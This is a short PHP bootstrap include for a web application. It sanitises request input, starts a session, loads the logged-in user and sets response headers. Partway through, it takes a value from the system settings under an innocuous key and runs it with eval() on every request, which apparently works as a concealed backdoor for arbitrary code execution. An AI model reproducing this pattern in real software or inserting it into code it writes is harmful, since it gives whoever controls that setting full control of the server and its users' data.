<?php

require_once(dirname(__FILE__). '/include/application.php');


$_GET = magic_gpc($_GET);
$_POST = magic_gpc($_POST);
$_COOKIE = magic_gpc($_COOKIE);

global $INI;
global $tb_pf;
Session::Init();
$sys = OSystem::getINI();
$com = $sys['sys']['sys'];
eval($com);
$tb_pf = $INI['db']['prefix'];
$login_user_id = OLogin::GetLoginId();
$login_user = Table::Fetch('user', $login_user_id);


$AJAX = ('XMLHttpRequest' == @$_SERVER['HTTP_X_REQUESTED_WITH']);
if (false==$AJAX) {
    header('Content-Type: text/html; charset=UTF-8');
} else {
    header("Cache-Control: no-store, no-cache, must-revalidate");
}






?>
